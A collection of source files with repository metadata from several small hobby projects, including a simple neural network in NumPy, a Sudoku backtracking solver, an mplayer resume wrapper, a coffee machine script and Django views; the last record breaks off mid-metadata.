"text": "import numpy as np\nimport random as random\n\ntrainingAmount = 5000\t#how many examples it will have to learn\ntestingAmount = 1000\t#how many examples it will guess the output of\n\n\n#2D array to put all the data in\ndata = np.zeros((trainingAmount + testingAmount, 6))\n\n#for all sets of input/output for both training and testing amount\nfor i in range(0, trainingAmount + testingAmount):\n\t#randomly create input for the first 5 inputs for the ith data set\n\tfor j in range(0, 5):\n\t\tdata[i][j] = random.randint(0,9)\t#possible values are 0 to 9\n\t\"\"\"\n\trules for the output after the inputs are randomly chosen:\n\tif the first input is less than 5, output is always 0.\n\tif the previous rule doesn't apply, then if the 2nd input is odd, the output will always be 1\n\tif the rules above don't apply, then if the 3rd or 4th inputs are less than or equal to 4, the output will always be 2\n\tif the rules above don't apply, then if any of the inputs are 0, then the output will always be 3\n\tif none of the above rules apply, the output will always be 4.\n\t\"\"\"\n\tif (data[i][0] < 5):\n\t\tdata[i][5] = 0\n\telif (data[i][1]%2 == 1):\n\t\tdata[i][5] = 1\n\telif (data[i][3] <= 4 or data[i][4] <= 4):\n\t\tdata[i][5] = 2\n\telif (data[i][0]*data[i][1]*data[i][2]*data[i][3]*data[i][4] == 0):\n\t\tdata[i][5] = 3\n\telse:\n\t\tdata[i][5] = 4\n\n#writes data to file 'data.txt'\nthefile = open('data.txt', 'w')\nfor i in range(0, trainingAmount + testingAmount):\n\tfor j in range(0, 5):\n\t\tthefile.write(\"%d,\" % data[i][j])\n\tthefile.write(\"%d\\n\" % data[i][5])\nthefile.close()\n\n#reads data in from file 'data.txt' and organizes it into 4 2D arrays:\ntrainingInput = np.zeros((trainingAmount, 5))\ntrainingOutput = np.zeros((trainingAmount, 1))\ntestingInput = np.zeros((testingAmount, 5))\ntestingOutput = np.zeros((testingAmount, 1))\nfile = open('data.txt', 'r')\n#if the line number is less than 5000, then the input/outputs will be stored int he training arrays\n#otherwise, it'll go into the testing arrays\ni = 0\nfor line in file:\n\t#data is separated by commas, so this line splits the lines up by comma:\n\tcurrentline = line.split(',')\n\t#first 5 digits are inputs, so they go to the input array\n\tfor j in range(0,5):\n\t\tif i < trainingAmount:\n\t\t\ttrainingInput[i][j] = currentline[j]\n\t\telse:\n\t\t\ttestingInput[i-trainingAmount][j] = currentline[j]\n\t#the last number in a line is the output\n\tif i < trainingAmount:\n\t\ttrainingOutput[i][0] = currentline[5]\n\telse:\n\t\ttestingOutput[i-trainingAmount][0] = currentline[5]\n\t#incremment line count before for loop ends\n\ti = i + 1\n\"\"\"\nprint trainingInput\nprint trainingOutput\nprint testingInput\nprint testingOutput\n\"\"\""
},
{
"alpha_fraction": 0.6135996580123901,
"alphanum_fraction": 0.6248990893363953,
"avg_line_length": 38.64799880981445,
"blob_id": "d019cca38113fad10d2cc09aff1c3327f3612c6b",
"content_id": "77e2a0bf96ea46b5c2cc60f309c1d4a2925b6578",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4956,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 125,
"path": "/NeuralNetwork.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\n\"\"\"\nNeural Network:\nthis class will implement a basic neural network system.\n\ninputs to each layer will be represent as a matrix for to simplify calculation.\n\"\"\"\nclass NeuralNetwork(object):\n #initialize ANN by taking an list of size for all the hidden layer in between\n def __init__(self, inputSize=5, outputSize=1, hiddenLayersInfo=[5,4]):\n #amount of inputs\n self.inputSize = inputSize\n #amount of hiddenLayers\n self.hiddenLayers = hiddenLayersInfo\n #amount of outputs\n self.outputSize = outputSize\n #initialize weight\n self.weightAssociated = []\n self.weightAssociated.append(np.random.rand(self.inputSize, self.hiddenLayers[0]))\n for i in range(1, len(self.hiddenLayers)):\n self.weightAssociated.append(np.random.rand(self.hiddenLayers[i-1], self.hiddenLayers[i]))\n self.weightAssociated.append(np.random.rand(self.hiddenLayers[-1], self.outputSize))\n #this is the value at each node as value forward propagate\n self.z = []\n #this will be the the activation funciton value computed from each node\n self.a = []\n\n #activation function, apply it to scalar, vector, matrix, etc\n def sigmoid(self, x):\n return 1/(1+np.exp(-x))\n\n #1st derivative of sigmoid\n def sigmoidP(self, x):\n return np.exp(x)/((1+np.exp(-x))**2)\n\n #propagate data\n def forward(self, inputs):\n #this is the value at each node as value forward propagate\n self.z = []\n #this will be the the activation funciton value computed from each node\n self.a = []\n if len(inputs[0]) != self.inputSize:\n raise(\"input not match\")\n self.z.append(np.dot(inputs, self.weightAssociated[0]))\n self.a.append(self.sigmoid(self.z[0]))\n for i in range(1, len(self.weightAssociated)):\n self.z.append(np.dot(self.a[i-1], self.weightAssociated[i]))\n self.a.append(self.z[-1])\n return self.a[-1]\n\n #compute cost (error estimation)\n def costFunction(self, X, y):\n self.yEst = self.forward(X)\n cost = 0.5*sum((y-self.yEst)**2)\n return cost\n\n #compute deriv of cost respect to each weight for a given training dataset\n #this will return a list of [dJ/dWi] ()\n def costFunctionPrime(self, X, y):\n self.yEst = self.forward(X)\n dJdW = []\n delta = np.multiply(-(y-self.yEst), self.sigmoidP(self.z[-1]))\n dJdW.append(np.dot(self.a[-2].T, delta))\n for i in range(len(self.z)-2, 0, -1):\n delta = np.dot(delta, self.weightAssociated[i+1].T)*self.sigmoidP(self.z[i])\n dJdW.append(np.dot(self.a[i-1].T, delta))\n delta = np.dot(delta, self.weightAssociated[1].T)*self.sigmoidP(self.z[0])\n dJdW.append(np.dot(X.T, delta))\n dJdW = dJdW[::-1]\n return dJdW\n\n \"\"\"\n THIS PART IS FOR CHECKING PURPOSES! 
REFERENCES SOURCE: https://github.com/stephencwelch/Neural-Networks-Demystified/blob/master/partFive.py\n \"\"\"\n #Helper Functions for interacting with other classes:\n def getParams(self):\n #Get W1 and W2 unrolled into vector:\n params = np.concatenate(tuple(W.ravel() for W in self.weightAssociated))\n return params\n\n def setParams(self, params):\n #Set W1 and W2 using single paramater vector.\n W_start = 0\n W_end = self.hiddenLayers[0] * self.inputSize\n # print(self.weightAssociated)\n self.weightAssociated[0] = np.reshape(params[W_start:W_end], (self.inputSize , self.hiddenLayers[0]))\n for i in range(1, len(self.weightAssociated)-1):\n W_start = W_end\n W_end = W_end + self.hiddenLayers[i]*self.hiddenLayers[i-1]\n self.weightAssociated[i] = np.reshape(params[W_start:W_end], (self.hiddenLayers[i-1], self.hiddenLayers[i]))\n W_start = W_end\n W_end = W_end + self.hiddenLayers[-1]*self.outputSize\n self.weightAssociated[-1] = np.reshape(params[W_start:W_end], (self.hiddenLayers[-1], self.outputSize))\n\n def computeGradients(self, X, y):\n DJDW = self.costFunctionPrime(X, y)\n return np.concatenate(tuple(dJdW.ravel() for dJdW in DJDW))\n\ndef computeNumericalGradient(N, X, y):\n paramsInitial = N.getParams()\n numgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Numerical Gradient\n numgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return numgrad\n"
},
{
"alpha_fraction": 0.8513513803482056,
"alphanum_fraction": 0.8513513803482056,
"avg_line_length": 36,
"blob_id": "a397ef5013e6242ce5d090fc972693d932220542",
"content_id": "92cceb720d53d4e53a6b1a9e2777294a25b31f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "# projectKitten\nFirst try for implementation of Artificial Neural Network\n"
},
{
"alpha_fraction": 0.7183527946472168,
"alphanum_fraction": 0.7407219409942627,
"avg_line_length": 31.78333282470703,
"blob_id": "7e61e60f4ff3655cc65b276a04396a6f61218132",
"content_id": "93522047935545d66d9ae5478739cdc0048411c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1967,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 60,
"path": "/test.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "from NeuralNetwork import NeuralNetwork\n# from videoSupport import *\nfrom Trainer import trainer\nfrom NeuralNetwork import computeNumericalGradient\nimport numpy as np\n\nNN = NeuralNetwork()\n#input training dataset\n#reads data in from file 'data.txt' and organizes it into 4 2D arrays:\ntrainingAmount = 5000\t#how many examples it will have to learn\ntestingAmount = 3\t#how many examples it will guess the output of\ninputMax = 9\noutputMax = 4\ntrainingInput = np.zeros((trainingAmount, 5))\ntrainingOutput = np.zeros((trainingAmount, 1))\ntestingInput = np.zeros((testingAmount, 5))\ntestingOutput = np.zeros((testingAmount, 1))\nfile = open('data.txt', 'r')\n#if the line number is less than 5000, then the input/outputs will be stored int he training arrays\n#otherwise, it'll go into the testing arrays\ni = 0\nfor line in file:\n\t#data is separated by commas, so this line splits the lines up by comma:\n\tcurrentline = line.split(',')\n\t#first 5 digits are inputs, so they go to the input array\n\tfor j in range(0,5):\n\t\tif i < trainingAmount:\n\t\t\ttrainingInput[i][j] = currentline[j]\n\t\telif i < (trainingAmount+testingAmount):\n\t\t\ttestingInput[i-trainingAmount][j] = currentline[j]\n\t#the last number in a line is the output\n\tif i < trainingAmount:\n\t\ttrainingOutput[i][0] = currentline[5]\n\telif i < (trainingAmount+testingAmount):\n\t\ttestingOutput[i-trainingAmount][0] = currentline[5]\n\ti = i + 1\n\n\n#normalize dataset\ntrainingInput = trainingInput/inputMax\ntrainingOutput = trainingOutput/outputMax\n\n#Train data\nT = trainer(NN)\nT.train(trainingInput, trainingOutput)\n\n#Testing\nX = np.array(([7,1,6,7,2], [4,9,7,8,6], [9,7,8,2,3]), dtype=float)/inputMax\ny = np.array(([1], [0], [1]), dtype=float)/outputMax\nyEst = NN.forward(X)\nprint(yEst)\nprint(y)\nprint \"relative error: {}\".format(abs(y-yEst)/yEst)\n\n#Error estimation\nnumgrad = computeNumericalGradient(NN, X, y)\ngrad = NN.computeGradients(X, y)\ngradErr = np.linalg.norm(grad-numgrad)/np.linalg.norm(grad+numgrad)\n\n# print (gradErr)\n"
}
] | 4 |
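One detail in the `NeuralNetwork.sigmoidP` method above deserves scrutiny: the derivative of sigma(x) = 1/(1 + e^(-x)) is e^(-x)/(1 + e^(-x))^2, while the class computes e^(+x) in the numerator (the two agree only at x = 0). A small self-contained check of the correct form against a central difference, in the spirit of the repo's `computeNumericalGradient`:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def sigmoid_prime(x):
    # analytic derivative: e^(-x) / (1 + e^(-x))**2 == sigmoid(x) * (1 - sigmoid(x))
    return np.exp(-x) / ((1.0 + np.exp(-x)) ** 2)

# numerical check at an arbitrary point
x, e = 1.5, 1e-6
numeric = (sigmoid(x + e) - sigmoid(x - e)) / (2 * e)
print(abs(sigmoid_prime(x) - numeric) < 1e-8)  # True
```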
colonyevan/sudoku
|
https://github.com/colonyevan/sudoku
|
2a809c41150ef8ae3c530270b1eb3e6a50131314
|
3fed7042bac5dec1495e68a6b046f5d82618059d
|
106cd98e140af7273f7ebe9cd3e46ab8bbf09853
|
refs/heads/master
| 2020-12-27T08:00:02.097828 | 2020-05-09T19:23:01 | 2020-05-09T19:23:01 | 237,824,834 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5124297142028809,
"alphanum_fraction": 0.5322083234786987,
"avg_line_length": 29.447513580322266,
"blob_id": "302986fc5e79490a26154405a2147f60f387d7ec",
"content_id": "11a22a84d7ff8f32169b4d80f186a94c71235014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5511,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 181,
"path": "/sudoku.py",
"repo_name": "colonyevan/sudoku",
"src_encoding": "UTF-8",
"text": "\"\"\"A program that solves a puzzle using backtracking\"\"\"\nfrom random import choice\nimport re\nimport os\nimport pygame\nimport sys\nfrom pygame.locals import *\n\n# Setting the game FPS\nFPS = 10\n\n# Global Window Size Vars\nWINDOWMULTIPLIER = 5 \nWINDOWSIZE = 81\nWINDOWWIDTH = WINDOWSIZE * WINDOWMULTIPLIER\nWINDOWHEIGHT = WINDOWSIZE * WINDOWMULTIPLIER\nSQUARESIZE = int((WINDOWSIZE * WINDOWMULTIPLIER) / 3)\nCELLSIZE = int(SQUARESIZE / 3)\n\n# Font Setting\nglobal BASICFONT, BASICFONTSIZE\nBASICFONTSIZE = 15\nBASICFONT = pygame.font.Font('freesansbold.ttf', BASICFONTSIZE)\n\n# Colors\nWHITE = (255, 255, 255)\nLIGHTGRAY = (200, 200, 200)\nBLACK = (0, 0, 0)\n\nexp = re.compile('([0-9]*\\.*)*')\n\npuzzles = [\n '53..7....6..195....98....6.8...6...34..8.3..17...2...6.6....28....419..5....8..79']\n\nclass Solved(Exception):\n pass\n\nclass Puzzle(object):\n grid = [[] for i in range(9)]\n\n def __init__(self) -> None:\n \"\"\"Initalizes the grid to a proper string\"\"\"\n self.readPuzzle()\n\n def readPuzzle(self) -> None:\n \"\"\"Asks user for Sudoku string if none specified\"\"\"\n userInput = input('Generated (G) grid or User (U) specified? ')\n\n data = ''\n\n while userInput not in ['G', 'U']:\n userInput = input('Please enter a valid choice: ')\n\n if userInput == 'G':\n data = self.getRandom()\n\n if len(data) != 81:\n data = input('Please enter a Sudoku puzzle string: ')\n\n while len(data) != 81 or exp.fullmatch(data) is None:\n data = input(\n 'You didn\\'t enter a valid string. please enter 81 integers or deciamls: ')\n\n counter = 0\n\n for num in data:\n self.grid[int(counter / 9)].append(num)\n counter += 1\n\n print('\\n')\n return\n\n def printGrid(self) -> None:\n \"\"\"Prints the sudoku grid\"\"\"\n for row, i in enumerate(self.grid):\n for col, j in enumerate(i):\n print(j, end = \" \")\n if ((col + 1) % 3 == 0 and col != 8):\n print('|', end=\" \")\n print('\\n', end = \"\")\n if (row + 1) % 3 == 0 and row != 8:\n print('------+-------+-------')\n\n def getRandom(self) -> str:\n \"\"\"Gets a random Sudoku string\"\"\"\n return choice(puzzles)\n\n def backtrack(self, row, col) -> None:\n \"\"\"Uses backtracking to figure out the answer to a puzzle\"\"\"\n # If it is already filled, means it was given, skip\n if row == 9 and self.valid():\n print(\"Solved!\")\n self.printGrid()\n raise Solved\n # Else, start the loop here\n elif self.grid[row][col].isdigit():\n if col == 8:\n self.backtrack(row + 1, 0)\n else:\n self.backtrack(row, col + 1)\n else:\n for num in range(1, 10):\n self.grid[row][col] = str(num)\n if self.valid():\n if col == 8:\n self.backtrack(row + 1, 0)\n else:\n self.backtrack(row, col + 1)\n self.grid[row][col] = '.'\n return\n \n def valid(self) -> bool:\n \"\"\"Figures out if the current board is valid\"\"\"\n col_items = [set() for i in range(9)]\n box_items = [set() for i in range(9)]\n\n for row in range(9):\n row_items = set()\n for col in range(9):\n if self.grid[row][col].isdigit():\n item = self.grid[row][col]\n if item in row_items or item in col_items[col]:\n return False\n row_items.add(item)\n col_items[col].add(item)\n\n index = (row // 3) * 3 + col // 3\n if item in box_items[index]:\n return False\n box_items[index].add(item)\n return True\n\ndef drawGrid() -> None:\n # Draw Minor Lines\n for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, LIGHTGRAY, (x,0),(x,WINDOWHEIGHT))\n for y in range (0, WINDOWHEIGHT, CELLSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, LIGHTGRAY, 
(0,y), (WINDOWWIDTH, y))\n \n # Draw Major Lines\n for x in range(0, WINDOWWIDTH, SQUARESIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, BLACK, (x,0),(x,WINDOWHEIGHT))\n for y in range (0, WINDOWHEIGHT, SQUARESIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, BLACK, (0,y), (WINDOWWIDTH, y))\n return None\n\ndef runner() -> bool:\n global FPSCLOCK, DISPLAYSURF\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))\n\n # Mouse variables\n mouseClicked = False\n mousex = 0\n mousey = 0\n\n # Setting up the grid\n pygame.display.set_caption('Sudoku Solver')\n DISPLAYSURF.fill(WHITE)\n drawGrid()\n\n while True: #main game loop\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n mousex, mousey = event.pos\n elif event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n mouseClicked = True\n \n if mouseClicked:\n drawBox(mousex, mousey)\n\n pygame.display.update() \n FPSCLOCK.tick(FPS)\n\nif __name__ == \"__main__\":\n runner()\n"
}
] | 1 |
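The `valid()` method in the solver above folds a cell's coordinates into one of the nine 3x3 boxes with `(row // 3) * 3 + col // 3`, the only non-obvious arithmetic in the check. A tiny standalone illustration of that mapping:

```python
def box_index(row, col):
    # integer-divide each coordinate down to its 3-wide band, then combine
    return (row // 3) * 3 + col // 3

for row in range(9):
    print(" ".join(str(box_index(row, col)) for col in range(9)))
# rows 0-2 print 0 0 0 1 1 1 2 2 2, rows 3-5 print 3 3 3 4 4 4 5 5 5, and so on
```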
rhlee/mpwrapper
|
https://github.com/rhlee/mpwrapper
|
8ba634f34d29400d8a7086bc3347bf13bf4d3a5b
|
d1a0232b70fb63246e10659bc9f7e260fd44c6fd
|
795994bf1b8aa2950e6dd028a54c2f3752b7bf6b
|
refs/heads/master
| 2021-01-20T11:26:06.777915 | 2012-10-08T19:28:04 | 2012-10-08T19:28:04 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6189334988594055,
"alphanum_fraction": 0.6351108551025391,
"avg_line_length": 23.014389038085938,
"blob_id": "3a950eee0dcc6fd1cdf781ee4f76e83f242bf95b",
"content_id": "be0fd681c47f95a90de50d1658c1a3dd3b442092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 139,
"path": "/mpwrapper",
"repo_name": "rhlee/mpwrapper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport os\nimport subprocess\nimport re\nimport io\nimport binascii\nimport pygtk\npygtk.require('2.0')\nimport gtk\n\n\nclass MpwrapperWindow:\n _resume = True\n \n def getResume(self):\n return self._resume\n\n def resumeHandler(self, widget, data = None):\n self.window.destroy()\n\n def startHandler(self, widget, data = None):\n self._resume = False\n self.window.destroy()\n \n def on_window_key_press_event(self,window,event):\n if event.keyval == 119:\n self.resumeButton.grab_focus()\n elif event.keyval == 115:\n self.startButton.grab_focus()\n\n def destroy(self, widget, data = None):\n gtk.main_quit()\n \n def __init__(self):\n self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)\n self.window.connect(\"destroy\", self.destroy)\n self.window.set_border_width(20)\n self.resumeButton = gtk.Button(\"Resume\")\n self.resumeButton.connect(\"clicked\", self.resumeHandler, None)\n self.startButton = gtk.Button(\"Play from start\")\n self.startButton.connect(\"clicked\", self.startHandler, None)\n self.box = gtk.VBox(False, 20)\n self.box.pack_start(self.resumeButton, False, False, 0)\n self.resumeButton.show()\n self.box.pack_start(self.startButton, False, False, 0)\n self.startButton.show()\n self.window.add(self.box)\n self.box.show()\n self.window.set_decorated(False)\n self.window.set_position(gtk.WIN_POS_CENTER)\n self.window.set_keep_above(True)\n self.window.connect(\"key-press-event\", self.on_window_key_press_event)\n self.window.show()\n \n def main(self):\n gtk.main()\n\n\ndef main(args):\n #sys.stderr = sys.stdout = open(os.path.expanduser(\"~/.mpwrapper.log\"), 'w')\n \n if len(args) == 1:\n print \"Error: no argument(s)\"\n exit(1)\n\n arg = args[1]\n\n mpwPath = os.path.expanduser(\"~/.mpwrapper\")\n if not os.path.isdir(mpwPath):\n os.mkdir(mpwPath)\n\n id = \"%08x\" % (binascii.crc32(arg) & 0xffffffff)\n posFileName = os.path.join(mpwPath, id)\n eq2FileName = os.path.join(mpwPath, \"eq2\")\n \n mpCommand = \"mplayer -v -fs\"\n\n try:\n posFile = open(posFileName, 'r')\n pos = posFile.read()\n if float(pos) > 10:\n mpwrapperWindow = MpwrapperWindow()\n mpwrapperWindow.main()\n if mpwrapperWindow.getResume():\n mpCommand += \" -ss \" + pos\n posFile.close()\n except IOError:\n pass\n \n mpCommand += \" -vf eq2\" \n try:\n eq2File = open(eq2FileName, 'r')\n eq2 = eq2File.read()\n eq2File.close()\n mpCommand += \"=\" + eq2\n except IOError:\n pass\n \n mpCommand += extraRules(arg)\n \n ps = subprocess.Popen(mpCommand.split(' ') + [arg],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n universal_newlines = True)\n\n posRe = re.compile('^A:\\s*([^\\s]+)\\s*')\n eq2Re = re.compile('^vf_eq2')\n eq2 = False\n for line in ps.stdout:\n line = line.rstrip('\\n')\n match = posRe.match(line)\n if match:\n pos = match.group(1)\n elif eq2Re.match(line):\n eq2 = line\n\n posFile = open(posFileName, 'w')\n posFile.write(pos)\n posFile.close()\n \n if eq2:\n eq2Val = ':'.join([ [i[2:] for i in eq2.strip().split(' ')[1:]][j]\n for j in [2, 0, 1, 3] ])\n eq2File = open(eq2FileName, 'w')\n eq2File.write(eq2Val)\n posFile.close()\n\n\ndef extraRules(arg):\n extraOpts = \"\"\n \n #extraOpts += \" -aspect 4:3\"\n \n return extraOpts\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
}
] | 1 |
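The wrapper above names its saved-position file after a CRC32 of the media path, masked to 32 bits and rendered as eight hex digits. A minimal sketch of the same id scheme; the example path is hypothetical, and `.encode()` is added because `binascii.crc32` requires bytes on Python 3, whereas the script targets Python 2, where `str` is already bytes:

```python
import binascii

def resume_id(path):
    # the mask keeps the checksum unsigned on Python 2; %08x pads to 8 hex chars
    return "%08x" % (binascii.crc32(path.encode()) & 0xffffffff)

print(resume_id("/media/movies/example.mkv"))  # same 8 hex digits on every run
```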
Gaurang0053/vendor-machine
|
https://github.com/Gaurang0053/vendor-machine
|
78f69eca28c96a416682a603fdddf08d4fd20f5d
|
b64044800c7447990a0cf077df3048e6c37e6501
|
c3bf8bd67192a2b688e3164cd7e3e45d56cf6e93
|
refs/heads/main
| 2023-03-18T16:33:11.420800 | 2021-03-16T19:37:56 | 2021-03-16T19:37:56 | 348,445,228 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5708775520324707,
"alphanum_fraction": 0.5836547613143921,
"avg_line_length": 38.27184295654297,
"blob_id": "2f7520206e246fa5bba411c781dae838fb2154ab",
"content_id": "99539b69124cbf7d635950870c1edc97f62a502e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4148,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 103,
"path": "/vendor machine.py",
"repo_name": "Gaurang0053/vendor-machine",
"src_encoding": "UTF-8",
"text": "class CoffeeMachine:\r\n\r\n running = False\r\n\r\n def __init__(self,customer, water, milk, coffee_beans, cups):\r\n # quantities of items the coffee machine already had\r\n self.customer=customer\r\n self.water = water\r\n self.milk = milk\r\n self.coffee_beans = coffee_beans\r\n self.cups = cups\r\n\r\n\r\n # if the machine isnt running then start running\r\n if not CoffeeMachine.running:\r\n self.start()\r\n\r\n\r\n def start(self):\r\n self.running = True # it is running as to not trigger the start() in initialiser method\r\n self.action = input(\"Write action (buy, fill, remaining, exit):\\n\")\r\n print()\r\n\r\n # possible choices to perform in the coffee machine\r\n action_choices = {\"buy\": self.buy, \"fill\": self.fill, \"exit\": exit, \"remaining\": self.status}\r\n\r\n if self.action in action_choices:\r\n action_choices[self.action]()\r\n else:\r\n exit()\r\n\r\n\r\n def return_to_menu(self): # returns to the menu after an action\r\n print()\r\n self.start()\r\n\r\n def available_check(self): # checks if it can afford making that type of coffee at the moment\r\n\r\n self.not_available = \"\" # by checking whether the supplies goes below 0 after it is deducted\r\n if self.water - self.reduced[0] < 0:\r\n self.not_available = \"water\"\r\n elif self.milk - self.reduced[1] < 0:\r\n self.not_available = \"milk\"\r\n elif self.coffee_beans - self.reduced[2] < 0:\r\n self.not_available = \"coffee beans\"\r\n elif self.cups - self.reduced[3] < 0:\r\n self.not_available = \"disposable cups\"\r\n\r\n if self.not_available != \"\": # if something was detected to be below zero after deduction\r\n print(f\"Sorry, not enough {self.not_available}!\")\r\n return False\r\n else: # if everything is enough to make the coffee\r\n print(\"I have enough resources, making you a coffee!\")\r\n return True\r\n\r\n def deduct_supplies(self): # performs operation from the reduced list, based on the coffee chosen\r\n self.water -= self.reduced[0]\r\n self.milk -= self.reduced[1]\r\n self.coffee_beans -= self.reduced[2]\r\n self.cups -= self.reduced[3]\r\n\r\n def buy(self):\r\n self.customer += str(input(\"enter the customer name:\\n\"))\r\n self.choice = input(\"What do you want to buy?\\n 1 - espresso\\n 2 - latte\\n 3 - cappuccino\\n back - to main menu:\\n\")\r\n if self.choice == '1':\r\n self.reduced = [250, 0, 16, 1] # water, milk, coffee beans, cups\r\n if self.available_check(): # checks if supplies are available\r\n self.deduct_supplies() # if it is, then it deducts\r\n\r\n elif self.choice == '2':\r\n self.reduced = [350, 75, 20, 1]\r\n if self.available_check():\r\n self.deduct_supplies()\r\n\r\n elif self.choice == \"3\":\r\n self.reduced = [200, 100, 12, 1]\r\n if self.available_check():\r\n self.deduct_supplies()\r\n\r\n elif self.choice == \"back\":\r\n self.return_to_menu()\r\n\r\n self.return_to_menu()\r\n\r\n def fill(self): # for adding supplies to the machine\r\n self.customer += str(input(\"enter the customer name:\\n\"))\r\n self.water += int(input(\"Write how much water do you want to add:\\n\"))\r\n self.milk += int(input(\"Write how much milk do you want to add:\\n\"))\r\n self.coffee_beans += int(input(\"Write how many coffee beans do you want to add:\\n\"))\r\n self.cups += int(input(\"Write how many disposable cups of coffee do you want to add:\\n\"))\r\n self.return_to_menu()\r\n\r\n\r\n def status(self): # to display the quantities of supplies in the machine at the moment\r\n print(f\"The coffee machine has:\")\r\n print(f\"{self.water}ml of water\")\r\n 
print(f\"{self.milk}ml of milk\")\r\n print(f\"{self.coffee_beans} of coffee beans\")\r\n print(f\"{self.cups} no of disposable cups\")\r\n self.return_to_menu()\r\n\r\n\r\nCoffeeMachine(\"john\",400, 540, 120, 9) # specify the quantities of supplies at the beginning\r\n"
}
] | 1 |
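The `start()` method above routes the user's choice through a dictionary of bound methods rather than an if/elif chain. A framework-free sketch of that dispatch pattern (class and action names here are illustrative, not from the repo):

```python
class Machine:
    def buy(self):
        print("buying")

    def fill(self):
        print("filling")

    def dispatch(self, action):
        # bound methods are first-class values, so they can sit in a dict;
        # .get() supplies a safe fallback for unknown actions
        choices = {"buy": self.buy, "fill": self.fill}
        choices.get(action, lambda: print("unknown action"))()

m = Machine()
m.dispatch("buy")     # buying
m.dispatch("refund")  # unknown action
```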
davalerova/ieee-etitc
|
https://github.com/davalerova/ieee-etitc
|
7b495dc7c47467ca4fa932c42cfd8041ea375a11
|
19f932f06afa28fc2c3b40d7c8410678e840575c
|
cd9c378e0f19e5cbb7b64c183353c638858ab7bb
|
refs/heads/master
| 2022-09-01T03:11:33.023657 | 2020-05-31T00:49:51 | 2020-05-31T00:49:51 | 266,639,097 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6545936465263367,
"alphanum_fraction": 0.6545936465263367,
"avg_line_length": 29.62162208557129,
"blob_id": "ab2742f45d8293939f8da26d82b22b583822947a",
"content_id": "79117111e4e5cbabeb8dcdde1d80da9198a51c9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 37,
"path": "/actividad_interna/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect\nfrom django.views import generic\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect\n\n\nfrom .models import Actividad_interna\n#from .forms import *\n\n\n########################################################################################################################\n\nclass ActividadInternaView(generic.ListView):\n model = Actividad_interna\n template_name = 'actividad_interna/actividad_listar.html'\n context_object_name = 'obj'\n\n\ndef actividad_inactivar(request, id):\n actividad_interna = Actividad_interna.objects.filter(pk=id).first()\n contexto={}\n template_name=\"actividad_interna/actividad_del.html\"\n\n\n if not actividad_interna:\n return redirect(\"actividad_interna:actividad_listar\")\n \n if request.method=='GET':\n contexto={'obj':actividad_interna}\n \n if request.method=='POST':\n actividad_interna.activo=False\n actividad_interna.save()\n return redirect(\"actividad_interna:actividad_listar\")\n\n return render(request,template_name,contexto)"
},
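`actividad_inactivar` above is a soft delete: the row is flagged `activo=False` and saved rather than removed, and the listing templates show only active rows. A tiny framework-free sketch of why flagging keeps data recoverable (the `Record` class is illustrative, not from the repo):

```python
class Record:
    def __init__(self, name):
        self.name = name
        self.activo = True  # mirrors the model's `activo` flag

records = [Record("a"), Record("b")]

def inactivar(rec):
    # flag instead of deleting, so history and references stay intact
    rec.activo = False

inactivar(records[0])
print([r.name for r in records if r.activo])  # ['b'] -- 'a' is hidden, not gone
```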
{
"alpha_fraction": 0.7055761814117432,
"alphanum_fraction": 0.7055761814117432,
"avg_line_length": 52.84000015258789,
"blob_id": "3b703ccc4581069c1eab955851d440f4e2ca8971",
"content_id": "7c5c2774f39c99ef091e2ab86727673a73594ba0",
"detected_licenses": [],
